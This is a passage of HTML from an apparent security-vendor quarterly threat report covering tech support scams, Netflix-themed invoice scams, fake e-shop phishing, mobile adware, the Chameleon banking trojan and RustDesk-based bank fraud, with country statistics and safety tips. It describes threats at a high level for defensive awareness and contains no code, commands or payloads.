  4287. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/map_2023_Q4-q_reports-TSS-Q423_clean2_2023-10-01—2023-12-31-1024x639.png" alt="" class="wp-image-7988" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/map_2023_Q4-q_reports-TSS-Q423_clean2_2023-10-01—2023-12-31-1024x639.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/map_2023_Q4-q_reports-TSS-Q423_clean2_2023-10-01—2023-12-31-300x187.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/map_2023_Q4-q_reports-TSS-Q423_clean2_2023-10-01—2023-12-31-768x479.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/map_2023_Q4-q_reports-TSS-Q423_clean2_2023-10-01—2023-12-31-1536x958.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/map_2023_Q4-q_reports-TSS-Q423_clean2_2023-10-01—2023-12-31-2048x1278.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Heatmap showing risk-ratio for Q4/2023</figcaption></figure></div>
  4288.  
  4289.  
4290. <p>Our ranking is traditionally dominated by Japan and the USA, followed by Spain. Interestingly, last quarter&#8217;s leader, Germany, has fallen back and rounds out our top six, just behind France.</p>
  4291.  
  4292.  
  4293.  
  4294. <ul>
  4295. <li>Japan 1.08%</li>
  4296.  
  4297.  
  4298.  
  4299. <li>United States 1.02%</li>
  4300.  
  4301.  
  4302.  
  4303. <li>Spain 0.81%</li>
  4304.  
  4305.  
  4306.  
  4307. <li>Australia 0.72%</li>
  4308.  
  4309.  
  4310.  
  4311. <li>France 0.68%</li>
  4312.  
  4313.  
  4314.  
  4315. <li>Germany 0.64%</li>
  4316. </ul>
  4317.  
  4318.  
  4319.  
4320. <p>Looking at the activity graph for Spain, we can see that most of the activity came at the end of November.</p>
  4321.  
  4322.  
  4323. <div class="wp-block-image">
  4324. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4-TSS_Q423_ES_2023-10-01—2023-12-31-1024x404.png" alt="" class="wp-image-7989" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4-TSS_Q423_ES_2023-10-01—2023-12-31-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4-TSS_Q423_ES_2023-10-01—2023-12-31-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4-TSS_Q423_ES_2023-10-01—2023-12-31-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4-TSS_Q423_ES_2023-10-01—2023-12-31-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4-TSS_Q423_ES_2023-10-01—2023-12-31-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Tech Support Scam activity in Q4/2023 for Spain</figcaption></figure></div>
  4325.  
  4326.  
  4327. <p>The Tech Support Scam landing pages change very little. The same techniques are still used to block the user’s browser and force the user to dial the phone number offered. Therefore, the example of the most prevalent landing page shows only minor changes.</p>
  4328.  
  4329.  
  4330. <div class="wp-block-image">
  4331. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="527" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/TSS_spanish_variant-1024x527.png" alt="" class="wp-image-7990" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/TSS_spanish_variant-1024x527.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/TSS_spanish_variant-300x154.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/TSS_spanish_variant-768x395.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/TSS_spanish_variant-1536x790.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/TSS_spanish_variant.png 1677w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>The Spanish variant of the most prevalent version of the TSS landing page</em></figcaption></figure></div>
  4332.  
  4333.  
  4334. <h3 class="wp-block-heading">Refund and Invoice Scams</h3>
  4335.  
  4336.  
  4337.  
  4338. <p><em>Invoice scams involve fraudsters sending false bills or invoices for goods or services that were never ordered or received. Scammers rely on invoices looking legitimate, often using company logos or other branding to trick unsuspecting victims into making payments. These scams can be especially effective when targeted at businesses, as employees may assume that a colleague made the purchase or simply overlook the details of the invoice. It&#8217;s important to carefully review all invoices and bills before making any payments and to verify the legitimacy of the sender if there are any suspicions of fraud.</em></p>
  4339.  
  4340.  
  4341.  
  4342. <h6 class="wp-block-heading"><strong>Online Billing: New Frontier for Cybercriminals in 2024</strong></h6>
  4343.  
  4344.  
  4345.  
  4346. <p>It&#8217;s common for internet users to have approximately 80-90 passwords for various services, as reported by <a href="https://www.newswire.com/news/new-research-most-people-have-70-80-passwords-21103705" target="_blank" rel="noreferrer noopener">LastPass</a>, and cybercriminals take advantage of a simple fact: users must keep track of an unimaginable number of subscription accounts. Additionally, many traditional companies that previously relied on manual service management processes are gradually transitioning their customers to paperless methods, such as online account billing. This shift, primarily a cost-saving measure, is likely to continue in the future, with most customer services moving to online accounts or mobile apps. Attackers are aware of this trend, which has opened new avenues for cybercrime.</p>
  4347.  
  4348.  
  4349.  
  4350. <p>One fruitful strategy employed by cybercriminals is to target digital services that have widespread usage. In Q4 2023, we observed a significant increase in one particular type of scam: subscription fraud. Among these, Netflix scams emerged prominently. With Netflix&#8217;s user base soaring to <a href="https://www.statista.com/statistics/250934/quarterly-number-of-netflix-streaming-subscribers-worldwide/" target="_blank" rel="noreferrer noopener">over 250 million in</a> 2023, the likelihood of successfully attacking a random subscriber is quite high, especially in the US and Europe where the penetration of these services is generally higher.</p>
  4351.  
  4352.  
  4353.  
  4354. <p>The typical Netflix online billing scam generally arrives in the form of an email, which is a little more difficult to examine on a small screen. These messages are increasingly tailored to fit the small screens of mobile devices, in line with the growing trend of using cell phones to manage one&#8217;s entire online presence. Let&#8217;s look at what these scams look like:</p>
  4355.  
  4356.  
  4357. <div class="wp-block-image">
  4358. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="586" height="1024" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Untitled-586x1024.png" alt="" class="wp-image-7991" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Untitled-586x1024.png 586w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Untitled-172x300.png 172w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Untitled.png 622w" sizes="(max-width: 586px) 100vw, 586px" /><figcaption class="wp-element-caption">Netflix-based invoice scam spreading in Q4/2023</figcaption></figure></div>
  4359.  
  4360.  
  4361. <p>There are several red flags in the email that should raise alarms. A common thread is the language scammers use, which often creates a sense of urgency and sometimes includes spelling and grammar mistakes (though less so now that AI is increasingly used as a tool to help write scam messages). The color scheme of such messages is frequently tailored to enhance the sense of urgency, with a strong use of red, yellow, or a combination thereof. For a company like Netflix – which spends enormous amounts on marketing – the design, if examined closely, is not very well-executed. Additionally, companies typically do not ask you to update payment details via a link in an email. These are just the main red flags in this particular example.</p>
  4362.  
  4363.  
  4364.  
  4365. <p>Geographically, the countries most affected by these online billing scams are predominantly located in Europe and North America. There are a few exceptions: Australia has the highest risk ratio of 1.52%, and New Zealand is close behind with 1.11%, ranking third.&nbsp;</p>
  4366.  
  4367.  
  4368. <div class="wp-block-image">
  4369. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/map_Invoice-Scams-Q4-report_2023-12-01—2023-12-31-1024x639.png" alt="" class="wp-image-7992" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/map_Invoice-Scams-Q4-report_2023-12-01—2023-12-31-1024x639.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/map_Invoice-Scams-Q4-report_2023-12-01—2023-12-31-300x187.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/map_Invoice-Scams-Q4-report_2023-12-01—2023-12-31-768x479.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/map_Invoice-Scams-Q4-report_2023-12-01—2023-12-31-1536x958.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/map_Invoice-Scams-Q4-report_2023-12-01—2023-12-31-2048x1278.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Refund and invoice scam spreading in Q4/2023</figcaption></figure></div>
  4370.  
  4371.  
  4372. <p>In Q4/2023, when we examine online billing scam data on a month-by-month basis, we can identify a significant spike during the last week of November. Even the period leading up to Christmas was higher than normal, which might be attributed to the fact that, for many people, Christmas is a time when they report higher-than-usual stress levels, according to the <a href="https://www.apa.org/news/press/releases/2023/11/holiday-season-stress">American Psychological Association</a>. As we know, scammers take advantage of people’s vulnerable moments, and the holiday season is often fraught with them. Additionally, buying habits change during the holiday season, which might also contribute to the spike.</p>
  4373.  
  4374.  
  4375.  
  4376. <p>The trend line we see in the graph continues to climb throughout the fourth quarter, as seen below.&nbsp;</p>
  4377.  
  4378.  
  4379. <div class="wp-block-image">
  4380. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_Invoice-Scams-Q4-report_2023-12-01—2023-12-31-1024x404.png" alt="" class="wp-image-7993" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_Invoice-Scams-Q4-report_2023-12-01—2023-12-31-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_Invoice-Scams-Q4-report_2023-12-01—2023-12-31-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_Invoice-Scams-Q4-report_2023-12-01—2023-12-31-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_Invoice-Scams-Q4-report_2023-12-01—2023-12-31-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_Invoice-Scams-Q4-report_2023-12-01—2023-12-31-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Refund and invoice scam spreading in Q4/2023</figcaption></figure></div>
  4381.  
  4382.  
  4383. <p>As always, stay vigilant and pay close attention to the emails you receive, especially on your mobile device, to help avoid these types of scams.</p>
  4384.  
  4385.  
  4386.  
  4387. <h3 class="wp-block-heading">Phishing: Post-Holiday Phishing Alert in Online Shopping</h3>
  4388.  
  4389.  
  4390.  
  4391. <p><em>Phishing is a type of online scam where fraudsters attempt to obtain sensitive information including passwords or credit card details by posing as a trustworthy entity in an electronic communication, such as an email, text message, or instant message. The fraudulent message usually contains a link to a fake website that looks like the real one, where the victim is asked to enter their sensitive information.</em></p>
  4392.  
  4393.  
  4394.  
  4395. <p>As far as phishing is concerned, attackers did not relent in their efforts in Q4/2023. The phishing graph below highlights the overall increase in web threats.</p>
  4396.  
  4397.  
  4398. <div class="wp-block-image">
  4399. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_total_2023_Q4_malware_phishing_31_2023-10-01—2023-12-31-1024x404.png" alt="" class="wp-image-7994" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_total_2023_Q4_malware_phishing_31_2023-10-01—2023-12-31-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_total_2023_Q4_malware_phishing_31_2023-10-01—2023-12-31-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_total_2023_Q4_malware_phishing_31_2023-10-01—2023-12-31-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_total_2023_Q4_malware_phishing_31_2023-10-01—2023-12-31-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_total_2023_Q4_malware_phishing_31_2023-10-01—2023-12-31-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Phishing activity throughout 2023</figcaption></figure></div>
  4400.  
  4401.  
  4402. <p>Throughout 2023 we witnessed a wide array of phishing campaigns. During the fourth quarter, there was interesting activity in the category of fake online shops (also referred to as e-shops).</p>
  4403.  
  4404.  
  4405.  
  4406. <p>Following the holiday season, a surge of <a href="https://blog.avast.com/avast-researchers-detect-surge-in-fake-e-shops" target="_blank" rel="noreferrer noopener">over 4,000 fake e-shops</a> imitating popular brands posed a threat to online shoppers. Scammers exploited post-holiday bargain hunters, making vigilance crucial.</p>
  4407.  
  4408.  
  4409. <div class="wp-block-image">
  4410. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="460" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/fake_shop_2-1024x460.png" alt="" class="wp-image-7995" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/fake_shop_2-1024x460.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/fake_shop_2-300x135.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/fake_shop_2-768x345.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/fake_shop_2-1536x690.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/fake_shop_2.png 1918w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Fake TheNorthFace e-shop</figcaption></figure></div>
  4411.  
  4412.  
  4413. <p>The cyber criminals behind these fake e-shop attacks meticulously mimic renowned brands (including Nike, Adidas, Pandora, Zara, Hilfiger, The North Face and many more), luring consumers with incredibly realistic-looking websites. Their process involves phishing for personal information during a fake login, and the sites often appear amongst the top search results.</p>
  4414.  
  4415.  
  4416. <div class="wp-block-image">
  4417. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="647" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/google_search-1024x647.png" alt="" class="wp-image-7996" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/google_search-1024x647.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/google_search-300x190.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/google_search-768x485.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/google_search.png 1298w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Search top results including fake e-shop</figcaption></figure></div>
  4418.  
  4419.  
  4420. <p>In the final stages of the scam, users are coerced into providing personal and payment details, risking exposure of sensitive information.&nbsp;</p>
  4421.  
  4422.  
  4423.  
  4424. <p>Tips for safety include verifying website credibility, cautious sale shopping, watching for fraud signals, and keeping security software updated.</p>
  4425.  
  4426.  
  4427. <div class="wp-block-image">
  4428. <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="845" height="538" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/fake_shop_login.png" alt="" class="wp-image-7997" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/fake_shop_login.png 845w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/fake_shop_login-300x191.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/fake_shop_login-768x489.png 768w" sizes="(max-width: 845px) 100vw, 845px" /><figcaption class="wp-element-caption">Fake TheNorthFace e-shop – phishing login form</figcaption></figure></div>
  4429.  
  4430. <div class="wp-block-image">
  4431. <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="915" height="608" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/fake_shop_register.png" alt="" class="wp-image-7998" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/fake_shop_register.png 915w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/fake_shop_register-300x199.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/fake_shop_register-768x510.png 768w" sizes="(max-width: 915px) 100vw, 915px" /><figcaption class="wp-element-caption">Fake TheNorthFace e-shop – phishing register form</figcaption></figure></div>
  4432.  
  4433. <div class="wp-block-image">
  4434. <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="629" height="575" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/fake_shop_payment.png" alt="" class="wp-image-7999" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/fake_shop_payment.png 629w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/fake_shop_payment-300x274.png 300w" sizes="(max-width: 629px) 100vw, 629px" /><figcaption class="wp-element-caption">Fake TheNorthFace e-shop – phishing payment form</figcaption></figure></div>
  4435.  
  4436.  
  4437. <p class="has-text-align-right"><em>Alexej Savčin, Malware Analyst<br>Branislav Kramár,&nbsp;Malware Analyst<br>Matěj Krčma, Malware Analyst</em></p>
  4438.  
  4439.  
  4440.  
  4441. <h2 class="wp-block-heading">Mobile-Related Threats</h2>
  4442.  
  4443.  
  4444.  
  4445. <p>As we enter the new year, we can look back on an interesting quarter in the mobile threat landscape. While adware continued its reign as one of the most prevalent threats facing mobile users in Q4 2023, we also observed the Chameleon banker making a comeback and taking aim at victims’ bank accounts with new HTML injection prompts, coupled with disabling biometric unlocks, which allows it to extract victims’ PINs and passwords. A first for the mobile sphere, FakeRust remote desktop access applications were also used to make fraudulent payments on behalf of users, leaving them with little recourse in challenging these payments.</p>
  4446.  
  4447.  
  4448.  
  4449. <p>In the realm of mobile apps, a new spyware strain, coined Xamalicious, used the open-source framework Xamarin to stay undetected in the PlayStore and take over user devices to steal data and perform click fraud. We observed an unusual double SpyAgent targeting both Android and iOS users in Korea, aiming to extract sensitive information such as SMS messages and contacts. SpyLoans also continued to spread in the PlayStore and was used to extort victims, even threatening physical violence in some cases, breaching the digital and real-world divide.&nbsp;</p>
  4450.  
  4451.  
  4452. <div class="wp-block-image">
  4453. <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="672" height="330" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Mobile-Intro-Threats-SpyLoans.jpg" alt="" class="wp-image-8000" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Mobile-Intro-Threats-SpyLoans.jpg 672w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Mobile-Intro-Threats-SpyLoans-300x147.jpg 300w" sizes="(max-width: 672px) 100vw, 672px" /><figcaption class="wp-element-caption">SpyLoan app reviews on the PlayStore tell a story of extreme interest rates, harassment of contacts stolen from the device and in some cases even threats of violence</figcaption></figure></div>
  4454.  
  4455.  
  4456. <p>Finally, another set of malicious WhatsApp spyware mods was distributed to users, interestingly using the Telegram platform.</p>
  4457.  
  4458.  
  4459.  
  4460. <h3 class="wp-block-heading">Web-Threats Data in the Mobile Landscape</h3>
  4461.  
  4462.  
  4463.  
  4464. <p>As with Q3 2023, we now include web-threat related data in our telemetry for mobile threats. Scams, phishing and malvertising were responsible for most blocked attacks on mobile devices in Q4 2023. We noted a decrease in the percentage share of scams and an increase in phishing and malvertising compared to the previous quarter. These are discussed in more detail in the web-threat sections of this report.</p>
  4465.  
  4466.  
  4467. <div class="wp-block-image">
  4468. <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="790" height="348" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Q4-Avast-Mobile-Threats-Infographic.png" alt="" class="wp-image-8001" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Q4-Avast-Mobile-Threats-Infographic.png 790w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Q4-Avast-Mobile-Threats-Infographic-300x132.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Q4-Avast-Mobile-Threats-Infographic-768x338.png 768w" sizes="(max-width: 790px) 100vw, 790px" /><figcaption class="wp-element-caption">Graphs showing the most prevalent threats in the mobile sphere in Q4/2023</figcaption></figure></div>
  4469.  
  4470.  
  4471. <p>Web-based threats will continue to account for most blocked attacks on mobile devices going forward. For malware applications to initiate their intended malicious activity on Android or iOS, they must be installed by the user and activated by running the application. In most cases, additional permissions must be granted to the application to give it full control over the infected device.</p>
  4472.  
  4473.  
  4474.  
  4475. <p>Comparatively, web-based threats are much more likely to be encountered during regular browsing as most mobile device users browse the internet daily. These web threats can be contained in private messages, emails, and SMS but also in the form of malicious adverts, redirects, unwanted pop ups and via other avenues. Blocking web-threat based attacks is beneficial for the security of mobile devices, as malware actors often use them as an entry point to get the payload onto the mobile device of their victims.</p>
  4476.  
  4477.  
  4478.  
  4479. <h3 class="wp-block-heading">Adware remains at the top</h3>
  4480.  
  4481.  
  4482.  
  4483. <p><em>Adware threats on mobile phones refer to applications that display intrusive out-of-context adverts to users with the intent of gathering fraudulent advertising revenue. This malicious functionality is often delayed until sometime after installation and coupled with stealthy features such as hiding the adware app icon to prevent removal. Adware mimics popular apps such as games, camera filters, and wallpaper apps, to name a few.</em></p>
  4484.  
  4485.  
  4486.  
  4487. <p>Adware was yet again the most prevalent of the traditional on-device malware threats in the mobile sphere in Q4 2023. Raking in fraudulent advertising revenue while negatively affecting the user experience of victims, these apps use various methods of spread to continue to sneak onto victims’ devices and remain hidden for as long as possible.</p>
  4488.  
  4489.  
  4490.  
  4491. <p>HiddenAds was again at the top of the adware list, trailed by SocialBar, a web threat adware that displays aggressive push notifications. Further down the list are MobiDash and FakeAdBlockers that altogether make up the bulk of adware threats facing mobile users this quarter.&nbsp;</p>
  4492.  
  4493.  
  4494.  
  4495. <p>On-device adware strains share some similarities: they often hide their icons once installed on user devices to prolong their malicious activity. Some adware has been seen serving advertisements while the screen is off to avoid detection and generate fraudulent revenue. Others are more brazen, displaying full-screen out-of-context ads to victims, greatly impacting their user experience as they struggle to identify the source of the annoying adverts.&nbsp;</p>
  4496.  
  4497.  
  4498.  
  4499. <p>Methods of spread for adware include third party app stores, fake websites distributing adware games and malicious redirects coupled with false advertising that leads users to download these adware apps.</p>
  4500.  
  4501.  
  4502. <div class="wp-block-image">
  4503. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="614" height="1024" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/1.-HiddenAds-device-admin-614x1024.jpg" alt="" class="wp-image-8002" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/1.-HiddenAds-device-admin-614x1024.jpg 614w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/1.-HiddenAds-device-admin-180x300.jpg 180w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/1.-HiddenAds-device-admin.jpg 768w" sizes="(max-width: 614px) 100vw, 614px" /><figcaption class="wp-element-caption">MobiDash requesting device administrator rights to impede its removal from the victim’s device</figcaption></figure></div>
  4504.  
  4505.  
  4506. <p>The risk ratio of adware increased in Q4 2023, and we observed a 14% increase in overall protected users. This trend is largely due to SocialBar and its increased prevalence on mobile devices, as evidenced by the large spike in the graph, which subsides in the later part of the quarter. Conversely, the HiddenAds risk ratio decreased this quarter.</p>
  4507.  
  4508.  
  4509. <div class="wp-block-image">
  4510. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2.Q3-Q4-graph-1024x404.png" alt="" class="wp-image-8003" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2.Q3-Q4-graph-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2.Q3-Q4-graph-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2.Q3-Q4-graph-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2.Q3-Q4-graph-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2.Q3-Q4-graph-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Global risk ratio of mobile adware in Q3/2023 and Q4/2023&nbsp;</figcaption></figure></div>
  4511.  
  4512.  
  4513. <p>Brazil, India and Argentina again have the most protected users this quarter. Conversely, Indonesia, India and South Africa have the highest risk ratios, meaning users are most likely to encounter adware in these countries according to our telemetry.</p>
  4514.  
  4515.  
  4516. <div class="wp-block-image">
  4517. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/3.-Q4-23-Risk-Map-1024x639.png" alt="" class="wp-image-8004" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/3.-Q4-23-Risk-Map-1024x639.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/3.-Q4-23-Risk-Map-300x187.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/3.-Q4-23-Risk-Map-768x479.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/3.-Q4-23-Risk-Map-1536x958.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/3.-Q4-23-Risk-Map-2048x1278.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Global risk ratio for mobile adware in Q4/2023</figcaption></figure></div>
  4518.  
  4519.  
  4520. <h3 class="wp-block-heading">Chameleon banker’s re-emergence</h3>
  4521.  
  4522.  
  4523.  
  4524. <p><em>Bankers are a sophisticated type of mobile malware that targets banking details, cryptocurrency wallets, and instant payments with the intent of extracting money. Generally distributed through phishing messages or fake websites, Bankers can take over a victim&#8217;s device by abusing the accessibility service. Once installed and enabled, they often monitor 2FA SMS messages and may display fake bank overlays to steal login information.</em></p>
  4525.  
  4526.  
  4527.  
  4528. <p>As is seemingly the trend most quarters, we once again observed a comeback of a previously discovered banker strain, this time Chameleon, returning after a hiatus of several months with new malicious features added. Remote desktop access applications were abused to perform fraudulent transactions on behalf of victims, followed by the introduction of malicious FakeRust bankers. Continuing the trend from last quarter and despite the new and updated entries, bankers are on the decline in terms of protected users yet again. Cerberus/Alien leads the pack, followed by Coper, Bankbot and Hydra.</p>
  4529.  
  4530.  
  4531.  
  4532. <p>The <a href="https://www.threatfabric.com/blogs/android-banking-trojan-chameleon-is-back-in-action" target="_blank" rel="noreferrer noopener">Chameleon</a> banker highlighted in the <a href="https://decoded.avast.io/threatresearch/avast-q2-2023-threat-report/" target="_blank" rel="noreferrer noopener">Q2/2023 report</a> is making a comeback with newly added features that give it more ways to take over and control victim devices. Previously targeting Australia and Poland, it disguised itself as tax or banking applications or cryptocurrency exchanges. With its re-emergence, Chameleon targets users in the UK and Italy as well, and it appears to be primarily distributed through phishing pages disguised as legitimate websites. As with most bankers, Chameleon requires the Accessibility service to perform its full device takeover. One of its upgrades allows it to display the Accessibility service prompt using an HTML-based pop-up on devices running Android 13, a step up from the previously used in-app prompts. Once it has full device control, this banker can now disable biometric unlocks for the device and installed applications. This bypass means Chameleon can spy on user PIN codes or passwords that must be used in lieu of biometrics, potentially adding another layer of information theft to its repertoire. The implications of this could be severe if more bankers adopt a similar approach in the future.</p>
  4533.  
  4534.  
  4535. <div class="wp-block-image">
  4536. <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="218" height="414" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/1.-Chameleon-HTML-prompts.jpg" alt="" class="wp-image-8005" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/1.-Chameleon-HTML-prompts.jpg 218w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/1.-Chameleon-HTML-prompts-158x300.jpg 158w" sizes="(max-width: 218px) 100vw, 218px" /><figcaption class="wp-element-caption">Chameleon’s new HTML prompt that overlays on top of App info, prompting victims to enable Accessibility rights</figcaption></figure></div>
  4537.  
  4538.  
  4539. <p>In a new trend, remote desktop access applications have been used in attacks targeting mobile users’ bank accounts. Due to database leaks from popular banks, threat actors gained access to sensitive victim data, which they used in their communication with victims. Pretending to be the banks’ security teams, the criminals conned victims into downloading the legitimate RustDesk application. After the app was installed, the threat actors requested a unique identifier from the victim, with which they took over the device and conducted fraudulent payments on the user’s behalf.&nbsp;</p>
  4540.  
  4541.  
  4542.  
  4543. <p>To make the situation worse, this device takeover has made it more difficult for victims to prove fraudulent activity, as it came from their device. RustDesk was removed from the PlayStore as a result, even though the application is not harmful on its own. Following the removal, fake banking websites were used to distribute a continuation of this threat, dubbed <a href="https://news.drweb.com/show/?i=14755&amp;lng=en" target="_blank" rel="noreferrer noopener">FakeRust</a>. Pretending to be bank support websites, they distributed fake support applications that allowed them remote access to devices to steal money as with RustDesk.</p>
  4544.  
  4545.  
  4546. <div class="wp-block-image">
